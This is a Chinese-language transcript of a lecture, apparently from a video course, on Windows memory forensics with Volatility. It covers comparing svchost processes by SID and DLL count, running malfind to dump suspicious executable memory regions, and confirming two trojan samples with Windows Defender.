有什么差别，有什么区别？那么因为它产生网络连接了，另外几个都没产生，那么我们就要比较一下这几个有什么这个不同的地方。所以我们这回改成这个1048，因为有多个进程嘛，所以我们把这几个都比较一下，1104、1252、1104、1152。956，这儿还有一个868，956、868。好，我们来查这几个进程，它们的这个 SID， 这几个进程对应有哪些用户对这个进程有权限？好，我们在这儿看一下1104，
稍等一下，我们回来继续啊。那么这是1104这个进程，那么这个其实是一个这个操作系统一个正常的进程，因为正常的这个 SVC host 的这个它是没有 system 这个用户账号权限的，这个时候我们就得对这个操作系统的一些基本的规则呀情况呢有一个大概的认识了。就是如果说这个你对操作系统的一些基本规则没有一个准确的认识的话，那么你在面对这么一大堆的这个字符信息的时候，你是没办法判断的。因为 SVC host 的默认情况下应该是不具备 system 权限的，而且默认情况下它应该是有这一些用户对这个 SVC host 是有相应这个权限的。那么我们数一下，大概它是1、2、3、4、5、6、7、8、9、10、11、12个这个相应的这个用户和用户组，这些个 SID 是对 SVC host 的这个进程是有权限的。那么我们再来看1048这个进程呢，那么它只有这几个用户组，那么对这个进程是有相应权限的。那么这几个组呢，包括 local system， 第一个就很值得怀疑，就是凡是因为默认情况下 SVC host 的这个进程是不应该有 system 权限的，而现在这个1048这个进程它是有 system 权限的。另外它只有这4个用户组对这个进程是有权限的，那么不像这个正常的是有12个组对这个进程是有权限的。然后我们再来看这956呢，这也是一个正常的这个进程，那么它也是有默认情况下是有12个这个进程，12个用户组对这个进程有权限。然后我们再来看这个868也值得怀疑。那么 local system 它和这个1048都是一样的，所以我们在这里就初步认为值得怀疑的有这个868和这个1048这么两个进程，868和1048这两个进程，比如说他们是值得怀疑的，有一定值得怀疑的地方。好，另外呢，我们再从另外一点，就是这个 DLL list。我们说每一个进程它是一个执行程序，那么它要执行所有的功能的过程，可能会调用一些个内部的库，或者是来自系统外部的一些库。那么这些库文件它调用了哪些库，然后这也是一个判断这个程序是恶意还是非恶意的一个因素吧。我们说先来看这个1048以及868，我们把其他那几个也给它加上了。那么其他那几个 SVC host 的进程，就是它们比对着来，这样呢大家能看出它的差别。1104、1152、1104、1152，比较这几个。我们可以在这里可以看到每一个 SVC host， 比如说这个1104这个 SVC host 的进程，那么它调用了哪些系统 DLL？ 那么一看调用了这么些个，大概有20几个吧。然后呢，再来看这个1048，你看1048调用的这个 DLL， 那么明显要多于这个1104调用的这个 DLL。如果都是正常的这个系统这个 SVC host 的话，他们调用的 DLL 的数量应该是差不多的。那如果说发现其中有一个异常于其他的这个 SVC host 的话，那就说明它是很值得怀疑的，可能有问题。然后这个868也会多一些。
但是没有多很多，但这里面多出最多的就是这个1048，所以它就最值得怀疑。而且其实我们可以重点关注一下这里面的每一个这个DLL， 然后通过这些 DLL 也能够发现一些问题，就有些 DLL 可能不是操作系统里面这个默认自带的一些个这个 DLL， 而是这个外部给它这个投放进来的。好，从这个 DLL 的数量，我们也可以发现一些这个可疑的线索的蛛丝马迹，但这些呢都是给我们一些个线索，都没有办法取得最直接、最直观的这个判断的依据。所以接下来这个就给我们一个很直观的一个判断依据了。下面这个插件。那么有些这个调用的 DLL 呢，有些这个恶意程序调用的 DLL 非常明显，我们一眼就能够判断出来，就是你有经验的话，你有相应的这个知识储备的话，你一眼就可以判断出来这是有问题的一个程序。因为这个要么是调用 DLL 特别多，要么是调用 DLL 特别少，因为这和这个恶意软件的这个类型有关。恶意软件通常如果说他想这个把自己体积变得更小的话，他就会把一些个这个现成的功能就去调用系统的 DLL 动态链接库去来执行，对，这样他可以把自身给弄得最小化。所以他在执行的时候，就是运行时，他会去这个 load 很多操作系统的这些 DLL， 把它们 load 到系统内存里来，然后调用它里面的函数来执行这个恶意程序想要的那些功能。对，它会大量调用系统正常的 DLL 进来，然后执行这个它恶意的目的。然后这是一种，就是恶意程序为了把自己的体积变得更小。另外一种就是恶意程序为了考虑兼容性的问题，因为你既然要调，如果像第一种刚才我们说的第一种，你全都调系统的 DLL 进来的话，那么你的兼容性肯定，你的恶意程序的兼容性就会有问题。因为你这个恶意程序如果跑到了是被发到了这个 XP 系统里，如果你可以正常执行的话，那如果下一次你被这个进入到一个这个 Win7 系统或者 Win8 系统或者 Win10 系统里，那么 Win7、Win8、Win10 和 WinXP 它们之间这个系统的动态链接库 DLL 都已经发生了大量的变化，尤其从这个 XP 跳到 Win7 这个阶段，系统的这个 DLL 文件，包括这个文件名，这个里面有很多代码都已经重写了，微软都已经重写过这里面的动态链接库。所以如果说你这个全调系统 DLL 的话，有可能在 XP 上你这个恶意程序可以正常运行，而跑到 Win7、Win8 里面你根本都运行不起来，因为它的系统动态链接库已经没有给你调的了，你要调那个动态链接库可能在 Win7、Win8 里就没有，所以这个时候你的兼容性就会不好。而为了保证兼容性更好，那么这个恶意程序的制造者呢，就会选择说我把所有的动态链接库在编译的时候，把它们里面用到的函数和功能全都给它一次性加载到我这个一体化的一个恶意程序里面。这个恶意程序里面包含了所有我需要的动态链接库，然后在执行的时候，我只要在这个程序内部，我自己调自己的动态链接库，执行自己的功能就可以了。但是这种不好的这个方面呢，就是你的恶意程序体积就会比较大，因为你这个调了很多的动态链接库，把它统一一起编译到自己的这个恶意程序，可能就是一个执行程序里面，所以它体积可能就会比较大。但是它的好处就是兼容性比较高。所以两种情况，两种极端，一种是说调动态链接库调的特别多的，另外一种是调动态链接库调特别少的，都很值得怀疑。然后当然你也要跟正常情况下这个一个进程，这个和动态链接它调动态链接库的这个正常情况是大概多少个，是调的哪些，然后你把那些个觉得有点问题的它调的哪些，然后和这些正常的进行一个比较，然后能够判断其中可疑的线索。好，这是这个刚才说到的这个，然后接下来我们再来看这个插件。这个插件呢，它的这个名字叫做这个 mail find，
没有犯的这个插件，它就这个给我们非常直观的这个指导，因为它的全名其实就是 malware， 就是那恶意程序犯的。这个插件的功能就是去找那些个可能是恶意程序的那些个进程，然后把它们找出来。当然这个他找出来的结果呢，我们也可以把它这个找出来的他觉得可疑的地方，他会把它给这个找出来，提取出来之后，我们可以给它指定一个目录，让它存到那个把可疑的内容都存到一个目录里面，然后我们再对那些可疑的这些提取出来的可疑文件来进行一个一个的这个分析判断。好，那么我们就直接运行它，然后杠 D 这个来输出到我们刚才那 MEM 目录里吧。MEM 目录里现在只有一个这个文件1096 dump 文件，我们把它删了，现在里面是空的，我们就用来存放一会儿我们要导出的这些个这个插件判断是有可能是恶意程序的那些个导出文件啊。好，运行完了，我们来看一下它的这个执行结果吧。我们看，哎呦，导出了这么多的这个 dump 文件，一个一个的 dump 文件。那么我们先从这个导出这个结果这个界面，我们来看一下。这是它的这个 SVC host 这个进程，他觉得可疑。而这个 SVC host 的这个 PID 呢是1048，就是1048那个进程的 SVC host， 他觉得可疑。为什么可疑呢？因为这个内存页，那么它是可执行的，同时呢又可读又可写，这个权限就很可疑。那么这是这个病毒、恶意程序，还有这个做缓冲器溢出，最后想这个执行代码的这种情况下，这个最喜欢找这种既可执行又可读又可写的这种内存空间。然后另外一个值得可疑的地方就是这块内存空间里存放的这个内容 MZ 开头的。如果大家对文件格式对这个二进制稍微了解一点的话，那么一定会不陌生。MZ 打头的，这是一个这个 PE 文件，也就是 Windows 下的这个可执行程序。所以这块内存空间里居然放了一个可执行程序，所以这一点，而且体积又不大，这么小巧，这个很值得怀疑。然后1048又是1048，那么它处的这个内存地址的这个位置应该是有所不同，5A8，然后这个呢是这个599，那么在不同的这个内存地址上，那么都有这个可疑的这个程序。这又是 MZ， 这又是一个执行程序，就是说这个进程1048这个进程，它在内存里头好几个这个内存地址上面去放置了一些个执行程序。那么如果说CPU 程序执行指到了这个内存空间的话，就会执行这个执行程序。然后还是1048，又换了一个地址，还是 MZ。然后这又是个 MZ， 还是1048，这1048在内存里插了大量的这种东西。然后下面这个是这个612这个进程。612这个进程呢，我们看它放的东西不是这个 MZ 打头的，但是呢，这块内存空间也是这个又可执行又可读又可写。然后612，这还是612，还是612。下面这些就是这段代码它的这个汇编指令了，这也是612， 612居然也这么多啊！好，到头了。这还有个588的，当然这些都不是执行程序的，但是这个也都是可疑的。
那么我们把这个可疑的都给它导出来，放到这个 memdump 这个目录下了。因为我们刚才啊这个导出的时候是没有指这个 PID 的，就是刚才运行这条命令的时候是没有指这个-T 的。因为我们刚才通过其他的检查，其实怀疑这1048和这个868这两个进程是值得可疑的地方，所以这个命令也可以加 PID， 就只查这一个进程它的可疑之处，这样也是可以的。刚才因为我们没加，所以它是查的整个这个内存空间里面所有进程的可疑之处。好，那么结果生成了这么多的 dump 文件。好，那么我们不管了，就把这些 dump 文件呢，这些 dump 文件其实就是刚才在内存空间里我们说可值得怀疑的那些内存空间里存放的那些内容，所以它们的体积大小其实通常来说并不大。那么这些 dump 文件呢，有可能就是那个执行程序，所以我们看一下，这里面有4个，这几个都是 date， 都是数据文件。那么我们通过判断呢，这数据文件至少它不是可执行格式的，这个可疑性还小一点。然后呢，这几个呢，直接就是这个可执行程序。所以既然是可执行程序的话，它的这个就更加值得怀疑。所以我们可以选择 copy 它，我们先一个一个拷贝到我们的这个物理机上面，因为我物理机上有杀毒软件，我把它拷贝过来，我们看看物理机的杀毒软件会不会杀它。拷了一个，哎，没反应，再拷一个。因为我物理机上是 Windows 自带的这个Defender 这个杀毒软件，然后再拷第2个，哎，还没反应。再拷第3个，出来了。Windows Defender 正在删除它，发现了一个恶意软件。哇，这一下我们就已经非常明确了。那么这个在内存里面已经发现了这个恶意程序了，病毒。然后我们再拷第4个。哦，第4个也没事。好，拷了4个，然后这个又发现一个，又杀了。我们用 Defender 扫描一下它。那么我们刚才发现了2个这个恶意程序，然后类型是特洛伊木马，程序很危险。D 盘一下这个文件。好，剩下这2个虽然这个 Defender 没有查出来，它没有杀它，但是我们其实也可以把它传到什么 VirusTotal 啊这样的网站上面去查一查。比如说我们来试一下吧。
算了，这个我这网速不是很快，我就不把它传上去了。大家自己做实验的时候自己去试一下吧，就这2个传上去，看看这个有没有其他的杀毒软件报它们是病毒。有可能是，也有可能不是，这个我就不在这里去给大家尝试了。因为这些执行程序有可能只是中间过程的一些个这个执行程序，它可能并不是我最终要执行那个 payload。刚才被直接杀掉那2个肯定是这个跟 payload 直接相关的。好，那么这大概呢就是一个我们说拿到一个内存文件大概的这么一个检查的思路。当然这里面细说的话还有这个几十种这个需要检查判断的地方，那我们在这儿只是我只能给大家简单的介绍一下这个过程了。拿到之后，你首先至少要查查这网络连接，要查查这个内存，然后查查这个 SID， 查查掉了多少 DLL， 这都是基本的分析恶意程序的一些个方法。然后 mailfind， 那么这是一个很好的一个插件，它能帮我们做很多事情。当然还有其他的这个，比如说包括这个查一查线程，然后查一查这个 word shell 等等，这个我就不在这里继续再多说了。这个 volatility 这个插件是值得大家花大量的时间去深入研究的。那么我们完全可以花3个月、5个月的时间去只研究这一个东西。那么它涉及到的知识和这个技术领域非常的广，对操作系统的了解的要求也都比较高。好，那么这个小节呢，我们就给大家介绍这一个插件，然后我们下一个小节再见了，谢谢大家。